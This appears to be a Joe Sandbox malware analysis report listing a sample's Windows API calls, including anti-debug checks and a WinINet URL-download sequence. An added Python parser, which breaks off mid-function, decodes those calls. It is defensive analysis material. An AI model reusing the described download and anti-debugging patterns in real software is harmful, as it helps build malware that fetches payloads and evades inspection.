                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: 9b051ea31137a2d3167818438b2e61acd42ea8b455ffca5c14ed3112d7e62c95
                                                                                                                                                                                            • Instruction ID: ed0b1c502b34d231f6343f30a585bfa7e6214075b33ffa55f7a7b0d98e70f584
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b051ea31137a2d3167818438b2e61acd42ea8b455ffca5c14ed3112d7e62c95
                                                                                                                                                                                            • Instruction Fuzzy Hash: 593129B5D4121DDBDB10DFA4D9897DDBBB8BF48300F1040EAE50DAB250EB759A848F45
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCAF2
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCB28
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006078A8
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006078F2
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006079B8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast_free
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3140898709-0
                                                                                                                                                                                            • Opcode ID: 085131a87800c626ca558845b4436aa4a17aafe70ac9487b4df0308e60ef0376
                                                                                                                                                                                            • Instruction ID: 8196806198a24a32b3516e9955a622559d4b303d13306a7f54d914b770c7e518
                                                                                                                                                                                            • Opcode Fuzzy Hash: 085131a87800c626ca558845b4436aa4a17aafe70ac9487b4df0308e60ef0376
                                                                                                                                                                                            • Instruction Fuzzy Hash: ED618171E841179FDB6C9F24CD82BBB77AAEF04300F1441A9E905C62C5E774E995CB50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005F4D8B
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005F4D95
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 005F4DA2
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                            • Opcode ID: f233aaba696ec19a2cde9d94a9a166940be12f1e2d0f909191e11042a77e2741
                                                                                                                                                                                            • Instruction ID: a5df6ce42a2dbc2e9d6b7e833ecab0f2b163db9f04108036a77876a7f10776f8
                                                                                                                                                                                            • Opcode Fuzzy Hash: f233aaba696ec19a2cde9d94a9a166940be12f1e2d0f909191e11042a77e2741
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0231D27494122D9BCB21DF28D8887DDBBB8BF48310F5045EAE90CA7291EB349F818F44
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005FB47B,?,20001004,00000000,00000002,?,?,005FAA88), ref: 005FD471
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: @0]
                                                                                                                                                                                            • API String ID: 2299586839-1162301288
                                                                                                                                                                                            • Opcode ID: 7679060122ec908f0fac60df62789b3ed6b6a0db993c6acae307c89f1a723f7c
                                                                                                                                                                                            • Instruction ID: 4b3e11cc8015ef2f6e4d0d598913e16490276fec77948d402ef7dc0039dbe439
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7679060122ec908f0fac60df62789b3ed6b6a0db993c6acae307c89f1a723f7c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E04F3154012CBBCF122F60DC08EBE7E3BFF44750F044810FE4666161CB769A20AAA4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f74521aab616ba6740b0b9f46b57c4c14643d332447ca1cf9c45f8c6b9e4c0f7
                                                                                                                                                                                            • Instruction ID: c8bdc2216102ce0e09f6b27dc55057c1650ed78089d976bc5363f65b415d1f27
                                                                                                                                                                                            • Opcode Fuzzy Hash: f74521aab616ba6740b0b9f46b57c4c14643d332447ca1cf9c45f8c6b9e4c0f7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F13F71E012199FDF14CFA8C8806BEBBB5FF88314F158269EA15AB345DB35AD01CB94
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,00000025,?,00000008,?,?,006002C9,00000025,?,00000008,?,?,0060B97D,00000000), ref: 006004FB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                            • Opcode ID: 08b8404696e13102da630c8d674026a5f4762f4cff16a600424a96c37a1102c8
                                                                                                                                                                                            • Instruction ID: f10dd37c8d7c8538a5963eab178a0e79bd9ed56738a4c4b5186157d79dac3fb3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 08b8404696e13102da630c8d674026a5f4762f4cff16a600424a96c37a1102c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: E0B13831650609CFE719CF28C486BA67BE1FF45364F258658E99ACF2E1C335E982CB40
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005F0AE9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                            • Opcode ID: ce39758004816f37305b78dee9bbe4f47a5d7cc713abfaddb2d8a2e9068930a1
                                                                                                                                                                                            • Instruction ID: b3680b9ad9ccb4fda73f484123cb46c2a1b18099853da45e3e91d5262bdfb347
                                                                                                                                                                                            • Opcode Fuzzy Hash: ce39758004816f37305b78dee9bbe4f47a5d7cc713abfaddb2d8a2e9068930a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 45519EB1A106198FEB24CF54D8957AEBBF2FB48314F28952AD505EB392D378AD40CF50
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCAF2
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCB28
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00607AFB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast_free$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2003897158-0
                                                                                                                                                                                            • Opcode ID: 41eb13bd7641c34543054f69666b07f5ccc258d9430849d18076ebcdf51da847
                                                                                                                                                                                            • Instruction ID: 25b21fda06a5889fa3ffa5d807379cef345f2b913e1095cfba8b2381ed9399e1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 41eb13bd7641c34543054f69666b07f5ccc258d9430849d18076ebcdf51da847
                                                                                                                                                                                            • Instruction Fuzzy Hash: A221837199520AABDB2C9F28DC46ABB77AAEF44310B10407EFA01C7281EB38FD45C654
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00607854,00000001,00000000,?,-00000050,?,00607E82,00000000,?,?,?,00000055,?), ref: 006077A0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: 589e5a73f947cfae8a526039fc2ea2e4c36607edfd61d3dbb5c532695c99b089
                                                                                                                                                                                            • Instruction ID: a54d6d4b921aa9bac1bae76e38bffdf0f4e76771d15cc06aa9f536309ba9e889
                                                                                                                                                                                            • Opcode Fuzzy Hash: 589e5a73f947cfae8a526039fc2ea2e4c36607edfd61d3dbb5c532695c99b089
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A11063A6443055FDB1C9F3888915BBBB92FF84399B14483DE98687B80D371B942C740
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00607A70,00000000,00000000,?), ref: 00607CFF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: 455a604c94a196f968dd398883854ad1efb2068419ea09eb5575c0e847a3a193
                                                                                                                                                                                            • Instruction ID: 55fbae705022d61015f32a4c0ebbcb952d1abf139c013acbed0cd626a5c4e61a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 455a604c94a196f968dd398883854ad1efb2068419ea09eb5575c0e847a3a193
                                                                                                                                                                                            • Instruction Fuzzy Hash: 97F0A972E841167BDB2C5A248849AFB775AEF40754F154C29ED46A32C0EA74FD42C5D0
                                                                                                                                                                                            APIs
  • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
  • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
• EnumSystemLocalesW.KERNEL32(00607AA7,00000001,?,?,-00000050,?,00607E46,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00607813
Memory Dump Source
• Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
• Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
APIs
  • Part of subcall function 005F800D: EnterCriticalSection.KERNEL32(?,?,005F97BC,00000000,0061D410,0000000C,005F9783,?,?,005FCEA4,?,?,005FCC32,00000001,00000364,00000006), ref: 005F801C
• EnumSystemLocalesW.KERNEL32(Function_0002CECE,00000001,0061D550,0000000C,005FD339,?), ref: 005FCF13
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
  • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
• EnumSystemLocalesW.KERNEL32(0060763C,00000001,?,?,?,00607EA4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0060771A
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000215A3,005F0D5C), ref: 005F159C
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f109be69dd04bd94a2a64cc93818bde7b7f94eb6067f1bf167ae3f90fd184b67
                                                                                                                                                                                            • Instruction ID: 52c7010095aa050fafa26e2120fbb20362fb0334f2e5686f61ec81f8dc2698d3
                                                                                                                                                                                            • Opcode Fuzzy Hash: f109be69dd04bd94a2a64cc93818bde7b7f94eb6067f1bf167ae3f90fd184b67
                                                                                                                                                                                            • Instruction Fuzzy Hash: 65510775B1455A9BDB0CCE6ED8405BC7BA7ABC4310B55C229E895CB285FB30D921DBC0
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a76c8b41ee9bc75d2759714812071b511e1e8fc557aef4e2560311458bc3420f
• Instruction ID: cea3d7ca0a27465b581415098c8b0f05140639a2d976037da1e8c6659c847040
• Opcode Fuzzy Hash: a76c8b41ee9bc75d2759714812071b511e1e8fc557aef4e2560311458bc3420f
• Instruction Fuzzy Hash: 6D21B673F20539477B0CC47ECC5327DB6E1C68C601745823AE8A6EA2C1D968D917E2E4
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 279f5634a47c25c446bf8056943306eb25e27aa06c712e42c86ec33765daf780
• Instruction ID: fd2b10ca01a8c6f1f6a1dc134a3de16706917c443102fa76880b8a0500b7a6ae
• Opcode Fuzzy Hash: 279f5634a47c25c446bf8056943306eb25e27aa06c712e42c86ec33765daf780
• Instruction Fuzzy Hash: D511A323F30C256A675C81A98C132BAA1D3EBD824070F533AD826E72C4E9A4DE13D290
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: afcdb447e23ab60f4f5b65069efe25a1be1483ee65b7e60996e630c246f1357e
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: 85115E7724188AC3D6148A7EC6B46B6AF95FBC5320B2C437AC2C24BB58D16B99419688
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c01e9777f494ea02394e51ea28b205c4ca470a38e1002bee0bddf62d3a72e8f1
• Instruction ID: 668e6e0178796af59a4bb9bbb70bdfe87b77f33a3306cbccdc41392e61a34d49
• Opcode Fuzzy Hash: c01e9777f494ea02394e51ea28b205c4ca470a38e1002bee0bddf62d3a72e8f1
• Instruction Fuzzy Hash: DDF03032A15228ABDB26CB48D409BA9B7B9EB47BA1F114066F601EB690D674DD00C7D0
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8784d531f00f65a1755ea2ee7bc53ba0411dda85326038387147794ac4c9694a
• Instruction ID: 5f45a05ba523eaa93a126c5800573258df0774d81e6a66eb511be302982e805b
• Opcode Fuzzy Hash: 8784d531f00f65a1755ea2ee7bc53ba0411dda85326038387147794ac4c9694a
• Instruction Fuzzy Hash: 11E08C3291122CEBCB24DB98C908D9AF7FCFB85B00B1140A6B601D3510C274DE00C7E0
APIs
Strings
Similarity
• API ID: _free$Info
• String ID: 0!a
• API String ID: 2509303402-1828747439
• Opcode ID: dd06fa724dda342ee85b0e1e271e8fb6269e25815537ed38e18aa8372ea195ee
• Instruction ID: 49e37efb9ed510ce3aee627b52112d717045d3e947927a0d31b81c56418389ee
• Opcode Fuzzy Hash: dd06fa724dda342ee85b0e1e271e8fb6269e25815537ed38e18aa8372ea195ee
• Instruction Fuzzy Hash: 1ED1AC71D0030A9FDB11DFA8C885BFEBFB5BF49300F144529E695AB282DB79A845CB50
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D2BA1
• InternetOpenUrlA.WININET(00000000,00000007,00000000,00000000,84000000,00000000), ref: 005D2C1D
• InternetCloseHandle.WININET(00000000), ref: 005D2C2A
• InternetCloseHandle.WININET(00000000), ref: 005D2C98
• InternetCloseHandle.WININET(00000000), ref: 005D2C9B
• InternetReadFile.WININET(00000000,?,00002000,?), ref: 005D2CC7
• InternetReadFile.WININET(00000000,?,00002000,?), ref: 005D2CFE
• InternetCloseHandle.WININET(00000000), ref: 005D2D52
• InternetCloseHandle.WININET(00000000), ref: 005D2D55
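The WinINet sequence listed above is a synchronous URL download: InternetOpenW with dwAccessType 1 (INTERNET_OPEN_TYPE_DIRECT, no proxy lookup), InternetOpenUrlA (the ANSI variant, paired with the wide InternetOpenW) with dwFlags 0x84000000, which is INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE (always fetch from the server, leave nothing in the WinINet cache), then InternetReadFile in 0x2000-byte chunks and InternetCloseHandle on each exit path. The script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses API lines in the report's own `Name.MODULE(args), ref: addr` format, decodes the access type and the flag bitmask with the constants from wininet.h, and reports the session/URL/read/close download pattern. The sample trace is constructed from the nine calls above; the zero arguments are the sandbox's statically resolved placeholders and are taken as given.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# dwFlags bits for InternetOpenUrl / HttpOpenRequest, values from wininet.h.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x40000000: "INTERNET_FLAG_RAW_DATA",
    0x20000000: "INTERNET_FLAG_EXISTING_CONNECT",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x01000000: "INTERNET_FLAG_FROM_CACHE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000400: "INTERNET_FLAG_HYPERLINK",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# dwAccessType argument of InternetOpen, also from wininet.h.
ACCESS_TYPES = {
    0: "INTERNET_OPEN_TYPE_PRECONFIG",
    1: "INTERNET_OPEN_TYPE_DIRECT",
    3: "INTERNET_OPEN_TYPE_PROXY",
    4: "INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY",
}

# One report line: "• Name.MODULE(arg,arg,...), ref: ADDR"; args are hex, '?' means unresolved.
LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the sandbox printed '?'
    ref: int                    # call-site address


def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in m.group(3).split(",") if a.strip()]
        args = [None if a == "?" else int(a, 16) for a in raw]
        calls.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
    return calls


def decode_flags(value: int) -> List[str]:
    """Expand a dwFlags bitmask into INTERNET_FLAG_* names; bits not in the table stay hex."""
    names = [n for bit, n in INTERNET_FLAGS.items() if value & bit]
    leftover = value & ~sum(INTERNET_FLAGS)
    if leftover:
        names.append(f"0x{leftover:08X}")
    return sorted(names)


def find_download_loop(calls: List[ApiCall]) -> Optional[dict]:
    """Describe a synchronous WinINet download if the trace opens a session, then a URL,
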